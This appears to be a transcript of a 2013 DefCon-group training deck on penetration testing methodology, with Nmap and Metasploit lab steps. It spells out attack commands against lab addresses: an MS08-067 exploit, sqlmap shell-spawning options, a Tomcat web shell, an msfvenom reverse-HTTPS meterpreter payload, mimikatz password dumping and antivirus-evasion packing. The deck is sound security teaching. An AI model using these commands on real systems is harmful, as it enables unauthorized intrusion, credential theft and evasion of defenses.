dc612 day - hands on penetration testing 101

61
Hands on Penetration Testing 101 DC612: March 9, 2013

Upload: dc612

Post on 10-May-2015

2.748 views

Category:

Documents


9 download

DESCRIPTION

Title: Hands on Penetration Testing 101 by Scott Sutherland & Karl Fosaaen Abstract: The goal of this training is to introduce attendees to standard penetration test methodologies, tools, and techniques. Hands on labs will cover the basics of asset discovery, vulnerability enumeration, system penetration, privilege escalation, and bypassing end point protection. During the labs, common vulnerabilities will be leveraged to illustrate attack techniques, using freely available tools such as Nmap and Metasploit. This training will be valuable to anyone interested in gaining a better understanding of penetration testing or to system administrators trying to understand common attack approaches.

TRANSCRIPT

Page 1: DC612 Day - Hands on Penetration Testing 101

Hands on Penetration Testing 101DC612: March 9, 2013

Page 2: DC612 Day - Hands on Penetration Testing 101

• Karl Fosaaen • Scott Sutherland---Security Consultants@ NetSPI

Who are we?

Page 3: DC612 Day - Hands on Penetration Testing 101

Presentation Overview

• What is a “Penetration Test”?• Why do companies “Pen test”?• Assessment VS. penetration test• Common penetration test approach • Rules of engagement• Nmap intro• Metasploit intro• Pen test labs• Wrap Up

Page 4: DC612 Day - Hands on Penetration Testing 101

What is Penetration Testing?

“The process of evaluating systems, applications, and protocols with the intent of identifying vulnerabilities from the perspective of an unprivileged or trusted user to determine the potential real world impacts…”

“…legally and under contract”

Page 5: DC612 Day - Hands on Penetration Testing 101

Why do Companies Pen Test?

• Compliance requirements• Identify unknown security gaps • Prioritize existing security initiatives• Validate existing controls• Prevent data breaches • Test IDS / IPS / IRP

Page 6: DC612 Day - Hands on Penetration Testing 101

What are the Technical Objectives?

• Client specific objectives first• Identify and verify all entry points• Identify critical escalation points• Gain unauthorized access to: ‒ Application functionality‒ Critical systems‒ Sensitive data

Page 7: DC612 Day - Hands on Penetration Testing 101

Assessment VS. Penetration

• Vulnerability Assessment and Penetration Testing Answer:‒What are my system layer vulnerabilities?‒Where are my system layer vulnerabilities?‒ How wide spread are my system layer

vulnerabilities?‒ Can I identify attacks?‒ How do I fix my vulnerabilities?

Page 8: DC612 Day - Hands on Penetration Testing 101

Assessment VS. Penetration

• Penetration Testing Answers:‒ What are my high impact network layer issues?‒ What are my high impact application layer issues?‒ Can an attacker gain unauthorized access to:

• critical infrastructure that provides privileged access or cause service disruptions

• critical application functionality that the business depends on

• sensitive data that the business would be required to report on if a breach occurs

‒ Can an attacker bypass our IPS / WAF? ‒ Can an attacker pivot from environment A to

environment B?

Page 9: DC612 Day - Hands on Penetration Testing 101

Rules of Engagement

• Have fun, but…Hack Responsibly!• Written permission• Stay in scope• No DoS• Don’t change major state• Restore state• Clear communication

Page 10: DC612 Day - Hands on Penetration Testing 101

Intro to the Common Toolsets

•Backtrack

•Nmap

•Metasploit

Page 11: DC612 Day - Hands on Penetration Testing 101

Intro to the Common Toolsets

•Backtrack

•Nmap

•Metasploit

Page 12: DC612 Day - Hands on Penetration Testing 101

Installing Backtrack

• Goal‒ Consolidate tools, and generally make a

penetration testing platform that is free.• Download Latest BT ISO‒ http://www.backtrack-linux.org/downloads/‒ Click download and choose ISO

• Download UNetbootin or YUMI‒ http://unetbootin.sourceforge.net/‒ http://www.pendrivelinux.com/yumi-multiboot-

usb-creator/• Install to USB‒ Follow program wizards to write ISO to USB

Page 13: DC612 Day - Hands on Penetration Testing 101

Intro to the Common Toolsets

•Backtrack

•Nmap

•Metasploit

Page 14: DC612 Day - Hands on Penetration Testing 101

Nmap Introduction

• Purpose: Service mapping, and vulnerability scanning• Download: insecure.org • Language: Based in C/C++, scripting in LUA• Modules types: Mostly enumeration, but

there are some exploits modules• Execution options: nmap cli and zenmap GUI• Scripts: Ship with nmap by default, but can

be download from insecure.org

Page 15: DC612 Day - Hands on Penetration Testing 101

Installing Nmap: Linux (Ubuntu)

• Download the latest build from:‒ http://nmap.org/download.html ‒ svn co –username guest

• Dependencies: gcc, openssl, and make• Install as root• apt-get install nmap• Install from source:‒ ./configure && make && make install

• Flags exist to remove features--without-zenmap

Page 16: DC612 Day - Hands on Penetration Testing 101

Installing Nmap: Windows

• Windows‒ Download the latest from

http://nmap.org/download.html‒ Login as admin, double click, next, next, done‒ Say YES! To winpcap

Page 17: DC612 Day - Hands on Penetration Testing 101

Nmap Tools

• Nmap: Used for network mapping and auditing• Ncat: Similar to netcat, but better• Ndiff: Used for comparing nmap scans• Nping: Used for understand firewall rules,

detect corruptions, and etc• Zenmap: Gui interface

Page 18: DC612 Day - Hands on Penetration Testing 101

Nmap Introduction

• LUA Scripts

Located in: • Script Categories:‒ Auth‒ Broadcast‒ Brute‒ default‒ Discovery‒ Dos‒ Exploit

/nmap/scripts

‒ External‒ Fuzzer‒ Intrusive‒Malware‒ Safe‒ version‒ vulnhttp://nmap.org/nsedoc/scripts/

Page 19: DC612 Day - Hands on Penetration Testing 101

Intro to the Common Toolsets

•Backtrack

•Nmap

•Metasploit

Page 20: DC612 Day - Hands on Penetration Testing 101

Metasploit Introduction

• Purpose: Develop and use scanners, admin tools, and exploits• Download: metasploit.com or clone

github.com repository.• Language: Ruby• Modules: Auxiliaries, Exploits, Encoders,

Nops, Payloads, Post• Execution options: msfconsole, msfcli, web

interfaces, rpc interface, armitage• Scripting: modules, resource scripts, startup

scripts, auto-run scripts, IRB, railgun

Page 21: DC612 Day - Hands on Penetration Testing 101

Installing Metasploit: Windows

• Disable anti-virus or create directory exception• Download from metasploit.com‒ Login as admin, double click, next, next, done

• Download git client for Windows‒ git clone https://

github.com/rapid7/metasploit-framework.git• Service / process heavy

Page 22: DC612 Day - Hands on Penetration Testing 101

Installing Metasploit: Linux (Ubuntu)

• apt-get update && apt-get install metasploit• Download git client for Linux‒ git clone

https://github.com/rapid7/metasploit-framework.git

Page 23: DC612 Day - Hands on Penetration Testing 101

Metasploit Introduction

•Modules are located in the following default Metasploit directories:

• Auxiliary: /msf3/modules/auxiliary• Exploit: /msf3/modules/exploits• Encoders: /msf3/modules/encoders• Nops: /msf3/modules/nops• Payloads: /msf3/modules/payloads• Post: /msf3/modules/post

Page 24: DC612 Day - Hands on Penetration Testing 101

Metasploit: Console Commands

• ?• search tomcat• use ‒exploit/windows/smb/ms08_067_netapi

• show options• show advance options• set & setg ‒ payload windows/meterpreter/reverse_https

• exploit & run• resource

Page 25: DC612 Day - Hands on Penetration Testing 101

Metasploit: Meterpreter Commands

• ipconfig• ls• ps• migrate• shell• execute• Post modules• AutoRunScript (single or multiple

commands)

Page 26: DC612 Day - Hands on Penetration Testing 101

Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

Page 27: DC612 Day - Hands on Penetration Testing 101

Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

Page 28: DC612 Day - Hands on Penetration Testing 101

Asset Discovery: Overview (internal)

• Goal: Identify active systems and services. This should include web applications and web services. • Common Methods:‒Passive identification (Sniffing)‒Directory Lookups (DNS, ADS, etc)‒Active identification (Scanning - Direct)‒Active identification (Scanning - Broadcast)

Page 29: DC612 Day - Hands on Penetration Testing 101

Asset Discovery: Labs

• Passive Network Mapping‒Wireshark: GUI‒ Network Miner: GUI‒ Cain and Abel

Page 30: DC612 Day - Hands on Penetration Testing 101

Asset Discovery: Labs

• Directory Listings‒ ADS Computer names via computeraccounts$

• Dumpacl • Metasploit smb_lookupsid module• adfind.exe (joeware)

‒ DNS Server Lookups• Nslookup –type=SRV _ldap._tcp.domain.com• Dnsrecon.py

‒ DNS Zone Transfer• Dig axfr domain.com @dnsserver• Dnsrecon.py

Page 31: DC612 Day - Hands on Penetration Testing 101

Asset Discovery: Labs

• Target IP Formats‒ Single

• Nmap 192.168.1.1‒Comma Separated

• Nmap 192.168.1.1, 192.168.1.1‒Range

• Nmap 192.168.1.1-254‒CIDR

• Nmap 192.168.1.0/24‒ File

• Nmap –iL ipaddress.txt

Page 32: DC612 Day - Hands on Penetration Testing 101

Asset Discovery: Labs

• Target Port Formats‒All

• Nmap –p-‒ Single

• Nmap –p80 192.168.1.1‒Comma

• Nmap –p80,443 192.168.1.1‒Range

• Nmap –p1-65535 192.168.1.1‒Protocol

• Nmap –sT –sU -pT:80,U:161

Page 33: DC612 Day - Hands on Penetration Testing 101

Asset Discovery: Labs

• List Scanning (RDNS)‒Nmap –sL 192.168.1.0/24

• Active Ping Sweeping‒ ICMP TS: Nmap –PE 192.168.1.1‒ SYN: Nmap –PS –p443 192.168.1.1‒ACK: Nmap –PA –p80 192.168.1.1

• Active Broadcast Ping‒ARP: Nmap –PR 192.168.1.1‒Scripts:

• Nmap --script=“broadcast”

Page 34: DC612 Day - Hands on Penetration Testing 101

Asset Discovery: Labs

• Basic Port Scanning‒TCP Full Connect• Nmap –sT 192.168.1.1

‒TCP SYN• Nmap -sS 192.168.1.1

‒No Ping• Nmap –sS –Pn 192.168.1.1

‒UDP • Nmap –sU 192.168.1.1

Page 35: DC612 Day - Hands on Penetration Testing 101

Asset Discovery: Labs

• Basic Performance Tuning‒Timing

• Nmap –sS –p80-443 –Pn –t 5• Higher is faster, but less accurate

‒Disable RDNS lookup• Nmap –sS –p80-443 –Pn –t 5 –n• Nmap –sS –p80-443 –Pn –t 5 -R

Page 36: DC612 Day - Hands on Penetration Testing 101

Asset Discovery: Labs

• Active Finger Printing‒Service finger printing• Nmap -sV

‒Operating system finger printing• Nmap –O

‒ Service and OS finger printing, script scanning, and traceroute• Nmap -A

Page 37: DC612 Day - Hands on Penetration Testing 101

Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

Page 38: DC612 Day - Hands on Penetration Testing 101

Vulnerability Enumeration: Overview

• Goal: Identify vulnerabilities at the application, server, and network layers. Weed out false positives and highlight potential entry points.• Common Methods:‒ Automated identification

• All layers: Many tools, multiple rounds‒Manual identification

• Verify automated findings• Application attacks• Password attacks (defaults and guessing)• Protocol attacks

Page 39: DC612 Day - Hands on Penetration Testing 101

Vulnerability Enumeration: Labs

• Basic Banner Grabbing‒ Ncat –p 80 192.168.1.1‒ Ncat –ssl –p443 192.168.1.1‒ Ncat –U –p161 192.168.1.1

Page 40: DC612 Day - Hands on Penetration Testing 101

Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with Nmap‒ Tomcat Case Study

• Identify service with Nmap• Nmap –sV –p22,514,8009,8080,9090

192.168.1.1• Verify credentials manually• Nmap --script=“vuln”

Page 41: DC612 Day - Hands on Penetration Testing 101

Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with MSF‒ Tomcat Case Study

• Find servers• use auxiliary/admin/http/tomcat_administration

• Find weak passwords• use auxiliary/scanner/http/tomcat_mgr_login

Page 42: DC612 Day - Hands on Penetration Testing 101

Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with Nmap‒MS08_067 Case Study

• Identify with Nmap• nmap --script smb-check-vulns.nse -p445

192.168.1.1

Page 43: DC612 Day - Hands on Penetration Testing 101

Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with Nmap‒ SQL Injection Case Study

• Identify with SQLMap• python sqlmap.py -u

http://192.168.1.106/employee.asp?id=1 -s session_log

• Verify Manually

Page 44: DC612 Day - Hands on Penetration Testing 101

Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

Page 45: DC612 Day - Hands on Penetration Testing 101

Penetration: Overview

• Goal: Gain initial unauthorized access to systems, applications, and sensitive data.• Common Methods:

Generally, vulnerabilities result in read access, write access, or arbitrary command execution.‒ Default credentials‒Weak protocols‒ SQL Injection‒ Upload vulnerabilities ‒Missing critical patches

Page 46: DC612 Day - Hands on Penetration Testing 101

Penetration: Labs

• Tomcat Case Study:‒ Log into tomcat with default password‒Create the war file

• Or use the CMD.war from the additional tools folder • Custom = unpack,edit,repack• http://www.nruns.com/_downloads/

Whitepaper-Hacking-jBoss-using-a-Browser.pdf

‒Publish the payload to get the web shell‒Navigate to the /cmd/cmd.jsp page

Page 47: DC612 Day - Hands on Penetration Testing 101

Penetration: Labs

• MS08_067 Case Study:‒Run Metasploit Exploit

• use exploit/windows/smb/ms08_067_netapi• set RHOST 192.168.1.1• exploit

Page 48: DC612 Day - Hands on Penetration Testing 101

Penetration: Labs

• SQL Injection Case Study:‒Use SQLMap to get SQL Shell

• python sqlpmap/sqlmap.py -u http://192.168.1.106/employee.asp?id=1 --sql-shell -s session_log

‒ Use SQLMap to get Meterpreter Shell• python sqlmap.py -u

http://192.168.1.106/employee.asp?id=1 -v 1 --os-pwn --msf-path=/opt/framework3/msf3 -s session_log --priv-esc

Page 49: DC612 Day - Hands on Penetration Testing 101

Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

Page 50: DC612 Day - Hands on Penetration Testing 101

Escalation: Overview

• Goal: Escalate privileges to gain access to critical resources.• Common Methods (Windows):‒ Getsystem (with UAC Bypass)‒ Clear text passwords‒ Known local exploits (sysret example)‒ Service attacks‒ Scheduler attacks‒ Impersonate Tokens (incognito or migrate)‒ Dump passwords (mimikatz, and msfpost)‒ Pass the hash (smart_hashdump + psexec)

Page 51: DC612 Day - Hands on Penetration Testing 101

Escalation: Labs

• GETSYSTEM‒Configure psexec with autorunscript

• Attack Scheduled Tasks‒Create scheduled task to run as system‒Configure task to run batch script files‒Give “Everyone” write access to scripts

• Attack Insecure Services‒Create insecurely registered service‒Drop evil program.exe‒Restart server for shell (auto migrate)

Page 52: DC612 Day - Hands on Penetration Testing 101

Bypassing Anti-Virus: Overview

• Goal: Execute malicious code without getting squashed by anti-virus.• Common Methods ‒ Bypass anti-virus configuration‒ Source code manipulation‒ Binary manipulation‒ Process / thread manipulation

Page 53: DC612 Day - Hands on Penetration Testing 101

Bypassing Anti-Virus: Labs

• Bypass configuration‒ Create a MSF DLL with reverse https payload

• msfvenom -p windows/meterpreter/reverse_https -e -i 1 LHOST=192.168.74.162 LPORT=55555 -f dll 1 > payload.dll

• Process Injection‒ Create a powershell injection payload with

ps_webshellscript• Pack an existing files‒Modify binary‒ Pack mimikatz with mpress, upx, or iexpress

Page 54: DC612 Day - Hands on Penetration Testing 101

Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

Page 55: DC612 Day - Hands on Penetration Testing 101

Evidence Gathering (Pilfering): Labs

• Finding Sensitive Files‒Common Locations• Databases• Text files• Applications

• Automated tools‒Spider‒Metasploit post modules

• auxiliary/admin/mssql/mssql_findandsampledata

Page 56: DC612 Day - Hands on Penetration Testing 101

Evidence Gathering (Pilfering): Labs

• Windows‒Find

• Linux‒Find‒Locate‒Grep/sed/awk

• Applications‒Thick client and Web apps

Page 57: DC612 Day - Hands on Penetration Testing 101

Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

Page 58: DC612 Day - Hands on Penetration Testing 101

Clean Up: Overview

• Goal: Be polite and leave the environment as you found it.

• Standard Clean Items‒ Remove backdoors‒ Remove all uploaded and generated files‒ Restore all service states‒ Restore all other configuration states‒ Remove accounts that were created

• Leave the logs – the goal is transparency

Page 59: DC612 Day - Hands on Penetration Testing 101

Wrap Up

• We covered:‒What penetration testing is‒Why companies pay for penetration testing‒What the rules of engagement are‒What the common approach is‒ How to leverage a few common vulnerabilities

But most importantly don’t for get to….

Page 60: DC612 Day - Hands on Penetration Testing 101

BE SAFE and

HACK RESPONSIBLY

Page 61: DC612 Day - Hands on Penetration Testing 101

Questions

Questions, comments, curses?